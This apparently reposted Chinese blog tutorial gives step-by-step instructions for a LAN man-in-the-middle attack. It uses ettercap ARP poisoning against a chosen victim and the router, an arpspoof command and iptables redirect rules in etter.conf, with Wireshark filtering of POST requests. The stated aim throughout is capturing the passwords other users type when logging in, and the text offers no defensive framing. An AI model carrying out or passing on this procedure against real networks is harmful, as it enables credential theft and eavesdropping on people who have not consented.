命令:
ettercap -G
启动中间人攻击,这里需要注意大小写。
依次点击sniff
-unified sniffing
选择我们的无线网卡
点击host
-scan for hosts
-host list
扫描设备
点击目标主机添加为target1
将路由设置为target2
然后点击mitm
-arp psisoning
将第一个勾选
然后点击start
当设备有密码登录时,我们就可以拦截到对方输入的密码。
当然,我们也可以用wireshark
分析post
来获取密码
当我们抓到握手包后,在协议中搜索http.request.method == "POST"
vim/etc/ettercap/etter.conf
去掉前面的#号
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
arpspoof -t 目标 网关 -i 设备
截取的密码
版权属于:逍遥子大表哥
本文链接:https://cloud.tencent.com/developer/article/1920875
按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。